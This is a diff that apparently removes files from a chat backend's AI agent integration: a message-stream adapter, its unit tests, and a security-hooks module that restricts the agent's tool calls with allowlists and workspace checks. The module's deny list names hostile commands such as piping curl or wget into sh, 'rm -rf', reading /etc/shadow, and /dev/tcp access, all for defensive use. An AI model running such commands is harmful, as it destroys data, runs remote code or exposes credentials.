||||
StreamToolOutputAvailable(
|
||||
toolCallId=block.tool_use_id,
|
||||
toolName=tool_name,
|
||||
output=output,
|
||||
success=not (block.is_error or False),
|
||||
)
|
||||
)
|
||||
|
||||
# Close the current step after tool results — the next
|
||||
# AssistantMessage will open a new step for the continuation.
|
||||
if self.step_open:
|
||||
responses.append(StreamFinishStep())
|
||||
self.step_open = False
|
||||
|
||||
elif isinstance(sdk_message, ResultMessage):
|
||||
self._end_text_if_open(responses)
|
||||
# Close the step before finishing.
|
||||
if self.step_open:
|
||||
responses.append(StreamFinishStep())
|
||||
self.step_open = False
|
||||
|
||||
if sdk_message.subtype == "success":
|
||||
responses.append(StreamFinish())
|
||||
elif sdk_message.subtype in ("error", "error_during_execution"):
|
||||
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
|
||||
responses.append(
|
||||
StreamError(errorText=str(error_msg), code="sdk_error")
|
||||
)
|
||||
responses.append(StreamFinish())
|
||||
|
||||
else:
|
||||
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
|
||||
|
||||
return responses
|
||||
|
||||
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
|
||||
"""Start (or restart) a text block if needed."""
|
||||
if not self.has_started_text or self.has_ended_text:
|
||||
if self.has_ended_text:
|
||||
self.text_block_id = str(uuid.uuid4())
|
||||
self.has_ended_text = False
|
||||
responses.append(StreamTextStart(id=self.text_block_id))
|
||||
self.has_started_text = True
|
||||
|
||||
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
|
||||
"""End the current text block if one is open."""
|
||||
if self.has_started_text and not self.has_ended_text:
|
||||
responses.append(StreamTextEnd(id=self.text_block_id))
|
||||
self.has_ended_text = True
|
||||
|
||||
|
||||
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
|
||||
"""Extract a string output from a ToolResultBlock's content field."""
|
||||
if isinstance(content, str):
|
||||
return content
|
||||
if isinstance(content, list):
|
||||
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
|
||||
if parts:
|
||||
return "".join(parts)
|
||||
try:
|
||||
return json.dumps(content)
|
||||
except (TypeError, ValueError):
|
||||
return str(content)
|
||||
if content is None:
|
||||
return ""
|
||||
try:
|
||||
return json.dumps(content)
|
||||
except (TypeError, ValueError):
|
||||
return str(content)
|
||||
@@ -1,366 +0,0 @@
|
||||
"""Unit tests for the SDK response adapter."""
|
||||
|
||||
from claude_agent_sdk import (
|
||||
AssistantMessage,
|
||||
ResultMessage,
|
||||
SystemMessage,
|
||||
TextBlock,
|
||||
ToolResultBlock,
|
||||
ToolUseBlock,
|
||||
UserMessage,
|
||||
)
|
||||
|
||||
from backend.api.features.chat.response_model import (
|
||||
StreamBaseResponse,
|
||||
StreamError,
|
||||
StreamFinish,
|
||||
StreamFinishStep,
|
||||
StreamStart,
|
||||
StreamStartStep,
|
||||
StreamTextDelta,
|
||||
StreamTextEnd,
|
||||
StreamTextStart,
|
||||
StreamToolInputAvailable,
|
||||
StreamToolInputStart,
|
||||
StreamToolOutputAvailable,
|
||||
)
|
||||
|
||||
from .response_adapter import SDKResponseAdapter
|
||||
from .tool_adapter import MCP_TOOL_PREFIX
|
||||
|
||||
|
||||
def _adapter() -> SDKResponseAdapter:
|
||||
a = SDKResponseAdapter(message_id="msg-1")
|
||||
a.set_task_id("task-1")
|
||||
return a
|
||||
|
||||
|
||||
# -- SystemMessage -----------------------------------------------------------
|
||||
|
||||
|
||||
def test_system_init_emits_start_and_step():
|
||||
adapter = _adapter()
|
||||
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
|
||||
assert len(results) == 2
|
||||
assert isinstance(results[0], StreamStart)
|
||||
assert results[0].messageId == "msg-1"
|
||||
assert results[0].taskId == "task-1"
|
||||
assert isinstance(results[1], StreamStartStep)
|
||||
|
||||
|
||||
def test_system_non_init_emits_nothing():
|
||||
adapter = _adapter()
|
||||
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
|
||||
assert results == []
|
||||
|
||||
|
||||
# -- AssistantMessage with TextBlock -----------------------------------------
|
||||
|
||||
|
||||
def test_text_block_emits_step_start_and_delta():
|
||||
adapter = _adapter()
|
||||
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
|
||||
results = adapter.convert_message(msg)
|
||||
assert len(results) == 3
|
||||
assert isinstance(results[0], StreamStartStep)
|
||||
assert isinstance(results[1], StreamTextStart)
|
||||
assert isinstance(results[2], StreamTextDelta)
|
||||
assert results[2].delta == "hello"
|
||||
|
||||
|
||||
def test_empty_text_block_emits_only_step():
|
||||
adapter = _adapter()
|
||||
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
|
||||
results = adapter.convert_message(msg)
|
||||
# Empty text skipped, but step still opens
|
||||
assert len(results) == 1
|
||||
assert isinstance(results[0], StreamStartStep)
|
||||
|
||||
|
||||
def test_multiple_text_deltas_reuse_block_id():
|
||||
adapter = _adapter()
|
||||
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
|
||||
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
|
||||
r1 = adapter.convert_message(msg1)
|
||||
r2 = adapter.convert_message(msg2)
|
||||
# First gets step+start+delta, second only delta (block & step already started)
|
||||
assert len(r1) == 3
|
||||
assert isinstance(r1[0], StreamStartStep)
|
||||
assert isinstance(r1[1], StreamTextStart)
|
||||
assert len(r2) == 1
|
||||
assert isinstance(r2[0], StreamTextDelta)
|
||||
assert r1[1].id == r2[0].id # same block ID
|
||||
|
||||
|
||||
# -- AssistantMessage with ToolUseBlock --------------------------------------
|
||||
|
||||
|
||||
def test_tool_use_emits_input_start_and_available():
|
||||
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
|
||||
adapter = _adapter()
|
||||
msg = AssistantMessage(
|
||||
content=[
|
||||
ToolUseBlock(
|
||||
id="tool-1",
|
||||
name=f"{MCP_TOOL_PREFIX}find_agent",
|
||||
input={"q": "x"},
|
||||
)
|
||||
],
|
||||
model="test",
|
||||
)
|
||||
results = adapter.convert_message(msg)
|
||||
assert len(results) == 3
|
||||
assert isinstance(results[0], StreamStartStep)
|
||||
assert isinstance(results[1], StreamToolInputStart)
|
||||
assert results[1].toolCallId == "tool-1"
|
||||
assert results[1].toolName == "find_agent" # prefix stripped
|
||||
assert isinstance(results[2], StreamToolInputAvailable)
|
||||
assert results[2].toolName == "find_agent" # prefix stripped
|
||||
assert results[2].input == {"q": "x"}
|
||||
|
||||
|
||||
def test_text_then_tool_ends_text_block():
|
||||
adapter = _adapter()
|
||||
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
|
||||
tool_msg = AssistantMessage(
|
||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
||||
model="test",
|
||||
)
|
||||
adapter.convert_message(text_msg) # opens step + text
|
||||
results = adapter.convert_message(tool_msg)
|
||||
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
|
||||
assert len(results) == 3
|
||||
assert isinstance(results[0], StreamTextEnd)
|
||||
assert isinstance(results[1], StreamToolInputStart)
|
||||
|
||||
|
||||
# -- UserMessage with ToolResultBlock ----------------------------------------
|
||||
|
||||
|
||||
def test_tool_result_emits_output_and_finish_step():
|
||||
adapter = _adapter()
|
||||
# First register the tool call (opens step) — SDK sends prefixed name
|
||||
tool_msg = AssistantMessage(
|
||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
|
||||
model="test",
|
||||
)
|
||||
adapter.convert_message(tool_msg)
|
||||
|
||||
# Now send tool result
|
||||
result_msg = UserMessage(
|
||||
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
|
||||
)
|
||||
results = adapter.convert_message(result_msg)
|
||||
assert len(results) == 2
|
||||
assert isinstance(results[0], StreamToolOutputAvailable)
|
||||
assert results[0].toolCallId == "t1"
|
||||
assert results[0].toolName == "find_agent" # prefix stripped
|
||||
assert results[0].output == "found 3 agents"
|
||||
assert results[0].success is True
|
||||
assert isinstance(results[1], StreamFinishStep)
|
||||
|
||||
|
||||
def test_tool_result_error():
|
||||
adapter = _adapter()
|
||||
adapter.convert_message(
|
||||
AssistantMessage(
|
||||
content=[
|
||||
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
|
||||
],
|
||||
model="test",
|
||||
)
|
||||
)
|
||||
result_msg = UserMessage(
|
||||
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
|
||||
)
|
||||
results = adapter.convert_message(result_msg)
|
||||
assert isinstance(results[0], StreamToolOutputAvailable)
|
||||
assert results[0].success is False
|
||||
assert isinstance(results[1], StreamFinishStep)
|
||||
|
||||
|
||||
def test_tool_result_list_content():
|
||||
adapter = _adapter()
|
||||
adapter.convert_message(
|
||||
AssistantMessage(
|
||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
||||
model="test",
|
||||
)
|
||||
)
|
||||
result_msg = UserMessage(
|
||||
content=[
|
||||
ToolResultBlock(
|
||||
tool_use_id="t1",
|
||||
content=[
|
||||
{"type": "text", "text": "line1"},
|
||||
{"type": "text", "text": "line2"},
|
||||
],
|
||||
)
|
||||
]
|
||||
)
|
||||
results = adapter.convert_message(result_msg)
|
||||
assert isinstance(results[0], StreamToolOutputAvailable)
|
||||
assert results[0].output == "line1line2"
|
||||
assert isinstance(results[1], StreamFinishStep)
|
||||
|
||||
|
||||
def test_string_user_message_ignored():
|
||||
"""A plain string UserMessage (not tool results) produces no output."""
|
||||
adapter = _adapter()
|
||||
results = adapter.convert_message(UserMessage(content="hello"))
|
||||
assert results == []
|
||||
|
||||
|
||||
# -- ResultMessage -----------------------------------------------------------
|
||||
|
||||
|
||||
def test_result_success_emits_finish_step_and_finish():
|
||||
adapter = _adapter()
|
||||
# Start some text first (opens step)
|
||||
adapter.convert_message(
|
||||
AssistantMessage(content=[TextBlock(text="done")], model="test")
|
||||
)
|
||||
msg = ResultMessage(
|
||||
subtype="success",
|
||||
duration_ms=100,
|
||||
duration_api_ms=50,
|
||||
is_error=False,
|
||||
num_turns=1,
|
||||
session_id="s1",
|
||||
)
|
||||
results = adapter.convert_message(msg)
|
||||
# TextEnd + FinishStep + StreamFinish
|
||||
assert len(results) == 3
|
||||
assert isinstance(results[0], StreamTextEnd)
|
||||
assert isinstance(results[1], StreamFinishStep)
|
||||
assert isinstance(results[2], StreamFinish)
|
||||
|
||||
|
||||
def test_result_error_emits_error_and_finish():
|
||||
adapter = _adapter()
|
||||
msg = ResultMessage(
|
||||
subtype="error",
|
||||
duration_ms=100,
|
||||
duration_api_ms=50,
|
||||
is_error=True,
|
||||
num_turns=0,
|
||||
session_id="s1",
|
||||
result="API rate limited",
|
||||
)
|
||||
results = adapter.convert_message(msg)
|
||||
# No step was open, so no FinishStep — just Error + Finish
|
||||
assert len(results) == 2
|
||||
assert isinstance(results[0], StreamError)
|
||||
assert "API rate limited" in results[0].errorText
|
||||
assert isinstance(results[1], StreamFinish)
|
||||
|
||||
|
||||
# -- Text after tools (new block ID) ----------------------------------------
|
||||
|
||||
|
||||
def test_text_after_tool_gets_new_block_id():
|
||||
adapter = _adapter()
|
||||
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
|
||||
adapter.convert_message(
|
||||
AssistantMessage(content=[TextBlock(text="before")], model="test")
|
||||
)
|
||||
adapter.convert_message(
|
||||
AssistantMessage(
|
||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
||||
model="test",
|
||||
)
|
||||
)
|
||||
# Send tool result (closes step)
|
||||
adapter.convert_message(
|
||||
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
|
||||
)
|
||||
results = adapter.convert_message(
|
||||
AssistantMessage(content=[TextBlock(text="after")], model="test")
|
||||
)
|
||||
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
|
||||
assert len(results) == 3
|
||||
assert isinstance(results[0], StreamStartStep)
|
||||
assert isinstance(results[1], StreamTextStart)
|
||||
assert isinstance(results[2], StreamTextDelta)
|
||||
assert results[2].delta == "after"
|
||||
|
||||
|
||||
# -- Full conversation flow --------------------------------------------------
|
||||
|
||||
|
||||
def test_full_conversation_flow():
|
||||
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
|
||||
adapter = _adapter()
|
||||
all_responses: list[StreamBaseResponse] = []
|
||||
|
||||
# 1. Init
|
||||
all_responses.extend(
|
||||
adapter.convert_message(SystemMessage(subtype="init", data={}))
|
||||
)
|
||||
# 2. Assistant text
|
||||
all_responses.extend(
|
||||
adapter.convert_message(
|
||||
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
|
||||
)
|
||||
)
|
||||
# 3. Tool use
|
||||
all_responses.extend(
|
||||
adapter.convert_message(
|
||||
AssistantMessage(
|
||||
content=[
|
||||
ToolUseBlock(
|
||||
id="t1",
|
||||
name=f"{MCP_TOOL_PREFIX}find_agent",
|
||||
input={"query": "email"},
|
||||
)
|
||||
],
|
||||
model="test",
|
||||
)
|
||||
)
|
||||
)
|
||||
# 4. Tool result
|
||||
all_responses.extend(
|
||||
adapter.convert_message(
|
||||
UserMessage(
|
||||
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
|
||||
)
|
||||
)
|
||||
)
|
||||
# 5. More text
|
||||
all_responses.extend(
|
||||
adapter.convert_message(
|
||||
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
|
||||
)
|
||||
)
|
||||
# 6. Result
|
||||
all_responses.extend(
|
||||
adapter.convert_message(
|
||||
ResultMessage(
|
||||
subtype="success",
|
||||
duration_ms=500,
|
||||
duration_api_ms=400,
|
||||
is_error=False,
|
||||
num_turns=2,
|
||||
session_id="s1",
|
||||
)
|
||||
)
|
||||
)
|
||||
|
||||
types = [type(r).__name__ for r in all_responses]
|
||||
assert types == [
|
||||
"StreamStart",
|
||||
"StreamStartStep", # step 1: text + tool call
|
||||
"StreamTextStart",
|
||||
"StreamTextDelta", # "Let me search"
|
||||
"StreamTextEnd", # closed before tool
|
||||
"StreamToolInputStart",
|
||||
"StreamToolInputAvailable",
|
||||
"StreamToolOutputAvailable", # tool result
|
||||
"StreamFinishStep", # step 1 closed after tool result
|
||||
"StreamStartStep", # step 2: continuation text
|
||||
"StreamTextStart", # new block after tool
|
||||
"StreamTextDelta", # "I found 2"
|
||||
"StreamTextEnd", # closed by result
|
||||
"StreamFinishStep", # step 2 closed
|
||||
"StreamFinish",
|
||||
]
|
||||
@@ -1,390 +0,0 @@
|
||||
"""Security hooks for Claude Agent SDK integration.
|
||||
|
||||
This module provides security hooks that validate tool calls before execution,
|
||||
ensuring multi-user isolation and preventing unauthorized operations.
|
||||
"""
|
||||
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import shlex
|
||||
from typing import Any, cast
|
||||
|
||||
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
# Tools that are blocked entirely (CLI/system access)
|
||||
BLOCKED_TOOLS = {
|
||||
"bash",
|
||||
"shell",
|
||||
"exec",
|
||||
"terminal",
|
||||
"command",
|
||||
}
|
||||
|
||||
# Safe read-only commands allowed in the sandboxed Bash tool.
|
||||
# These are data-processing / inspection utilities — no writes, no network.
|
||||
ALLOWED_BASH_COMMANDS = {
|
||||
# JSON / structured data
|
||||
"jq",
|
||||
# Text processing
|
||||
"grep",
|
||||
"egrep",
|
||||
"fgrep",
|
||||
"rg",
|
||||
"head",
|
||||
"tail",
|
||||
"cat",
|
||||
"wc",
|
||||
"sort",
|
||||
"uniq",
|
||||
"cut",
|
||||
"tr",
|
||||
"sed",
|
||||
"awk",
|
||||
"column",
|
||||
"fold",
|
||||
"fmt",
|
||||
"nl",
|
||||
"paste",
|
||||
"rev",
|
||||
# File inspection (read-only)
|
||||
"find",
|
||||
"ls",
|
||||
"file",
|
||||
"stat",
|
||||
"du",
|
||||
"tree",
|
||||
"basename",
|
||||
"dirname",
|
||||
"realpath",
|
||||
# Utilities
|
||||
"echo",
|
||||
"printf",
|
||||
"date",
|
||||
"true",
|
||||
"false",
|
||||
"xargs",
|
||||
"tee",
|
||||
# Comparison / encoding
|
||||
"diff",
|
||||
"comm",
|
||||
"base64",
|
||||
"md5sum",
|
||||
"sha256sum",
|
||||
}
|
||||
|
||||
# Tools allowed only when their path argument stays within the SDK workspace.
|
||||
# The SDK uses these to handle oversized tool results (writes to tool-results/
|
||||
# files, then reads them back) and for workspace file operations.
|
||||
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
|
||||
|
||||
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
|
||||
SANDBOXED_BASH_TOOLS = {"Bash"}
|
||||
|
||||
# Dangerous patterns in tool inputs
|
||||
DANGEROUS_PATTERNS = [
|
||||
r"sudo",
|
||||
r"rm\s+-rf",
|
||||
r"dd\s+if=",
|
||||
r"/etc/passwd",
|
||||
r"/etc/shadow",
|
||||
r"chmod\s+777",
|
||||
r"curl\s+.*\|.*sh",
|
||||
r"wget\s+.*\|.*sh",
|
||||
r"eval\s*\(",
|
||||
r"exec\s*\(",
|
||||
r"__import__",
|
||||
r"os\.system",
|
||||
r"subprocess",
|
||||
]
|
||||
|
||||
|
||||
def _deny(reason: str) -> dict[str, Any]:
|
||||
"""Return a hook denial response."""
|
||||
return {
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "PreToolUse",
|
||||
"permissionDecision": "deny",
|
||||
"permissionDecisionReason": reason,
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
def _validate_workspace_path(
|
||||
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
|
||||
) -> dict[str, Any]:
|
||||
"""Validate that a workspace-scoped tool only accesses allowed paths.
|
||||
|
||||
Allowed directories:
|
||||
- The SDK working directory (``/tmp/copilot-<session>/``)
|
||||
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
|
||||
"""
|
||||
path = tool_input.get("file_path") or tool_input.get("path") or ""
|
||||
if not path:
|
||||
# Glob/Grep without a path default to cwd which is already sandboxed
|
||||
return {}
|
||||
|
||||
resolved = os.path.normpath(os.path.expanduser(path))
|
||||
|
||||
# Allow access within the SDK working directory
|
||||
if sdk_cwd:
|
||||
norm_cwd = os.path.normpath(sdk_cwd)
|
||||
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
|
||||
return {}
|
||||
|
||||
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
|
||||
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
|
||||
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
|
||||
return {}
|
||||
|
||||
logger.warning(
|
||||
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
|
||||
)
|
||||
return _deny(
|
||||
f"Tool '{tool_name}' can only access files within the workspace directory."
|
||||
)
|
||||
|
||||
|
||||
def _validate_bash_command(
|
||||
tool_input: dict[str, Any], sdk_cwd: str | None
|
||||
) -> dict[str, Any]:
|
||||
"""Validate a Bash command against the allowlist of safe commands.
|
||||
|
||||
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
|
||||
Blocks command substitution, output redirection, and disallowed executables.
|
||||
|
||||
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
|
||||
containing ``|`` won't be mistaken for shell pipes).
|
||||
"""
|
||||
command = tool_input.get("command", "")
|
||||
if not command or not isinstance(command, str):
|
||||
return _deny("Bash command is empty.")
|
||||
|
||||
# Block command substitution — can smuggle arbitrary commands
|
||||
if "$(" in command or "`" in command:
|
||||
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
|
||||
|
||||
# Block output redirection — Bash should be read-only
|
||||
if re.search(r"(?<!\d)>{1,2}\s", command):
|
||||
return _deny("Output redirection (> or >>) is not allowed in Bash.")
|
||||
|
||||
# Block /dev/ access (e.g., /dev/tcp for network)
|
||||
if "/dev/" in command:
|
||||
return _deny("Access to /dev/ is not allowed in Bash.")
|
||||
|
||||
# Tokenize with shlex (respects quotes), then extract command names.
|
||||
# shlex preserves shell operators like | ; && || as separate tokens.
|
||||
try:
|
||||
tokens = shlex.split(command)
|
||||
except ValueError:
|
||||
return _deny("Malformed command (unmatched quotes).")
|
||||
|
||||
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
|
||||
expect_command = True
|
||||
for token in tokens:
|
||||
if token in ("|", "||", "&&", ";"):
|
||||
expect_command = True
|
||||
continue
|
||||
if expect_command:
|
||||
# Skip env var assignments (VAR=value)
|
||||
if "=" in token and not token.startswith("-"):
|
||||
continue
|
||||
cmd_name = os.path.basename(token)
|
||||
if cmd_name not in ALLOWED_BASH_COMMANDS:
|
||||
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
|
||||
logger.warning(f"Blocked Bash command: {cmd_name}")
|
||||
return _deny(
|
||||
f"Command '{cmd_name}' is not allowed. "
|
||||
f"Allowed commands: {allowed}"
|
||||
)
|
||||
expect_command = False
|
||||
|
||||
# Validate absolute file paths stay within workspace
|
||||
if sdk_cwd:
|
||||
norm_cwd = os.path.normpath(sdk_cwd)
|
||||
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
|
||||
for token in tokens:
|
||||
if not token.startswith("/"):
|
||||
continue
|
||||
resolved = os.path.normpath(token)
|
||||
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
|
||||
continue
|
||||
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
|
||||
continue
|
||||
logger.warning(f"Blocked Bash path outside workspace: {token}")
|
||||
return _deny(
|
||||
f"Bash can only access files within the workspace directory. "
|
||||
f"Path '{token}' is outside the workspace."
|
||||
)
|
||||
|
||||
return {}
|
||||
|
||||
|
||||
def _validate_tool_access(
|
||||
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
|
||||
) -> dict[str, Any]:
|
||||
"""Validate that a tool call is allowed.
|
||||
|
||||
Returns:
|
||||
Empty dict to allow, or dict with hookSpecificOutput to deny
|
||||
"""
|
||||
# Block forbidden tools
|
||||
if tool_name in BLOCKED_TOOLS:
|
||||
logger.warning(f"Blocked tool access attempt: {tool_name}")
|
||||
return _deny(
|
||||
f"Tool '{tool_name}' is not available. "
|
||||
"Use the CoPilot-specific tools instead."
|
||||
)
|
||||
|
||||
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
|
||||
if tool_name in SANDBOXED_BASH_TOOLS:
|
||||
return _validate_bash_command(tool_input, sdk_cwd)
|
||||
|
||||
# Workspace-scoped tools: allowed only within the SDK workspace directory
|
||||
if tool_name in WORKSPACE_SCOPED_TOOLS:
|
||||
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
|
||||
|
||||
# Check for dangerous patterns in tool input
|
||||
input_str = str(tool_input)
|
||||
|
||||
for pattern in DANGEROUS_PATTERNS:
|
||||
if re.search(pattern, input_str, re.IGNORECASE):
|
||||
logger.warning(
|
||||
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
|
||||
)
|
||||
return _deny("Input contains blocked pattern")
|
||||
|
||||
return {}
|
||||
|
||||
|
||||
def _validate_user_isolation(
|
||||
tool_name: str, tool_input: dict[str, Any], user_id: str | None
|
||||
) -> dict[str, Any]:
|
||||
"""Validate that tool calls respect user isolation."""
|
||||
# For workspace file tools, ensure path doesn't escape
|
||||
if "workspace" in tool_name.lower():
|
||||
path = tool_input.get("path", "") or tool_input.get("file_path", "")
|
||||
if path:
|
||||
# Check for path traversal
|
||||
if ".." in path or path.startswith("/"):
|
||||
logger.warning(
|
||||
f"Blocked path traversal attempt: {path} by user {user_id}"
|
||||
)
|
||||
return {
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "PreToolUse",
|
||||
"permissionDecision": "deny",
|
||||
"permissionDecisionReason": "Path traversal not allowed",
|
||||
}
|
||||
}
|
||||
|
||||
return {}
|
||||
|
||||
|
||||
def create_security_hooks(
|
||||
user_id: str | None, sdk_cwd: str | None = None
|
||||
) -> dict[str, Any]:
|
||||
"""Create the security hooks configuration for Claude Agent SDK.
|
||||
|
||||
Includes security validation and observability hooks:
|
||||
- PreToolUse: Security validation before tool execution
|
||||
- PostToolUse: Log successful tool executions
|
||||
- PostToolUseFailure: Log and handle failed tool executions
|
||||
- PreCompact: Log context compaction events (SDK handles compaction automatically)
|
||||
|
||||
Args:
|
||||
user_id: Current user ID for isolation validation
|
||||
sdk_cwd: SDK working directory for workspace-scoped tool validation
|
||||
|
||||
Returns:
|
||||
Hooks configuration dict for ClaudeAgentOptions
|
||||
"""
|
||||
try:
|
||||
from claude_agent_sdk import HookMatcher
|
||||
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
|
||||
|
||||
async def pre_tool_use_hook(
|
||||
input_data: HookInput,
|
||||
tool_use_id: str | None,
|
||||
context: HookContext,
|
||||
) -> SyncHookJSONOutput:
|
||||
"""Combined pre-tool-use validation hook."""
|
||||
_ = context # unused but required by signature
|
||||
tool_name = cast(str, input_data.get("tool_name", ""))
|
||||
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
|
||||
|
||||
# Strip MCP prefix for consistent validation
|
||||
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
|
||||
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
|
||||
|
||||
# Only block non-CoPilot tools; our MCP-registered tools
|
||||
# (including Read for oversized results) are already sandboxed.
|
||||
if not is_copilot_tool:
|
||||
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
|
||||
if result:
|
||||
return cast(SyncHookJSONOutput, result)
|
||||
|
||||
# Validate user isolation
|
||||
result = _validate_user_isolation(clean_name, tool_input, user_id)
|
||||
if result:
|
||||
return cast(SyncHookJSONOutput, result)
|
||||
|
||||
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
|
||||
return cast(SyncHookJSONOutput, {})
|
||||
|
||||
async def post_tool_use_hook(
|
||||
input_data: HookInput,
|
||||
tool_use_id: str | None,
|
||||
context: HookContext,
|
||||
) -> SyncHookJSONOutput:
|
||||
"""Log successful tool executions for observability."""
|
||||
_ = context
|
||||
tool_name = cast(str, input_data.get("tool_name", ""))
|
||||
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
|
||||
return cast(SyncHookJSONOutput, {})
|
||||
|
||||
async def post_tool_failure_hook(
|
||||
input_data: HookInput,
|
||||
tool_use_id: str | None,
|
||||
context: HookContext,
|
||||
) -> SyncHookJSONOutput:
|
||||
"""Log failed tool executions for debugging."""
|
||||
_ = context
|
||||
tool_name = cast(str, input_data.get("tool_name", ""))
|
||||
error = input_data.get("error", "Unknown error")
|
||||
logger.warning(
|
||||
f"[SDK] Tool failed: {tool_name}, error={error}, "
|
||||
f"user={user_id}, tool_use_id={tool_use_id}"
|
||||
)
|
||||
return cast(SyncHookJSONOutput, {})
|
||||
|
||||
async def pre_compact_hook(
|
||||
input_data: HookInput,
|
||||
tool_use_id: str | None,
|
||||
context: HookContext,
|
||||
) -> SyncHookJSONOutput:
|
||||
"""Log when SDK triggers context compaction.
|
||||
|
||||
The SDK automatically compacts conversation history when it grows too large.
|
||||
This hook provides visibility into when compaction happens.
|
||||
"""
|
||||
_ = context, tool_use_id
|
||||
trigger = input_data.get("trigger", "auto")
|
||||
logger.info(
|
||||
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
|
||||
)
|
||||
return cast(SyncHookJSONOutput, {})
|
||||
|
||||
return {
|
||||
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
|
||||
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
|
||||
"PostToolUseFailure": [
|
||||
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
|
||||
],
|
||||
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
|
||||
}
|
||||
except ImportError:
|
||||
# Fallback for when SDK isn't available - return empty hooks
|
||||
return {}
|
||||
@@ -1,258 +0,0 @@
|
||||
"""Unit tests for SDK security hooks."""
|
||||
|
||||
import os
|
||||
|
||||
from .security_hooks import _validate_tool_access, _validate_user_isolation
|
||||
|
||||
SDK_CWD = "/tmp/copilot-abc123"
|
||||
|
||||
|
||||
def _is_denied(result: dict) -> bool:
|
||||
hook = result.get("hookSpecificOutput", {})
|
||||
return hook.get("permissionDecision") == "deny"
|
||||
|
||||
|
||||
# -- Blocked tools -----------------------------------------------------------
|
||||
|
||||
|
||||
def test_blocked_tools_denied():
|
||||
for tool in ("bash", "shell", "exec", "terminal", "command"):
|
||||
result = _validate_tool_access(tool, {})
|
||||
assert _is_denied(result), f"{tool} should be blocked"
|
||||
|
||||
|
||||
def test_unknown_tool_allowed():
|
||||
result = _validate_tool_access("SomeCustomTool", {})
|
||||
assert result == {}
|
||||
|
||||
|
||||
# -- Workspace-scoped tools --------------------------------------------------
|
||||
|
||||
|
||||
def test_read_within_workspace_allowed():
|
||||
result = _validate_tool_access(
|
||||
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_write_within_workspace_allowed():
|
||||
result = _validate_tool_access(
|
||||
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert result == {}
|
||||
|
||||
|
||||
def test_edit_within_workspace_allowed():
|
||||
result = _validate_tool_access(
|
||||
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
|
||||
)
|
||||
assert result == {}
|
||||
|
||||
|
||||
